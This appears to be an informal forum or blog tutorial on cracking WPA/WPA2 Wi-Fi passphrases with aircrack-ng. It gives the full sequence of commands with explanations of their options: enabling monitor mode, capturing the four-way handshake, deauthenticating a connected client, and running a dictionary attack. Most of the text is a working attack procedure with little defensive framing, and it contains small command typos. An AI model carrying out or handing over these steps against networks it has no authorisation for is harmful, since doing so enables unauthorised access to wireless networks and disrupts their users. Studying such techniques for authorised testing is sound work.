what is the Difference Between cracking a WPA network and WPA2 network,Nothing !! There is no difference between cracking a WPA or WPA2 networks at all.In order to sucessfully crack any WPA/WPA2 network,there are 2 main things must happen
1) U must capture the Full 4 Way Handshake.
2) Your Passphrase must be in the DICTIONARY you choose in order to sucessfully BruteForce.
We will be using the aircrack-ng suite of tools and a small dictionary file on Ubuntu.
There are a few ways to crack a WPA / WPA2 PSK password this is just one of them.
This method is usally vunerable because of the end user, as most people will use a pass phrase thats easy to remember.
bcz evry body doesnt want to keep long password.
You will need the following details
A Client connected to the AP to Deauth
ESSID = this is the Name of your wireless network i.e MYWIRELESS
BSSID = this is the MAC address of your AP and will be in this format 00:1C:10:26:A9:39 everyone’s is different so make sure
you write it down correctly or the following will not work
Channel = This will be the channel your AP is Broadcasting on i.e channel 7
ALSO you will need a decent dictionary file you can find many of these around on the internet google is your friend on this one,then lets start below are the Steps
Step 1 - Start the wireless interface in monitor mode
Airmon-ng strat wifi0 (starts ur Interface with Monitor mode)
Airodump-ng ath0 (Monitors the Access point available)
Step 2 - Start airodump-ng to collect authentication handshake
Airodump-ng -c 11 -w psk –bssid 00:1C:10:26:A9:39 ath0
Where:
-c 11 is the channel for the wireless network
- -bssid 00:1C:10:26:A9:39 is the access point MAC address. This eliminate extraneous traffic.
-w psk is the file name prefix for the file which will contain the IVs.
ath0 is the interface name.
Important: Do NOT use the ”- -ivs” option. You must capture the full packets.
Step 3 - Use aireplay-ng to deauthenticate the wireless client
aireplay-ng -0 3 -a 00:1C:10:26:A9:39 -c 00:0F:B5:EC:99:6F ath0
Where:
-0 means deauthentication
3 is the number of deauths to send (you can send muliple if you wish)
-a 00:1C:10:26:A9:39 is the MAC address of the access point
-c 00:0F:B5:EC:99:6F is the MAC address of the client you are deauthing
ath0 is the interface name
Step 4 - Run aircrack-ng to crack the pre-shared key
aircrack-ng -w dictionary.txt -b 00:1C:10:26:A9:39 psk*.cap
Where:
-w password.lst is the name of the dictionary file. Remember to specify the full path if the file is not located in the same directory.
*.cap is name of group of files containing the captured packets. Notice in this case that we used the wildcard * to include multiple files.
Done now wait for some time It depends upon ur Dictionary file and the passphrase ,
You should now have your PSK passphrase
&evilmonkey000&
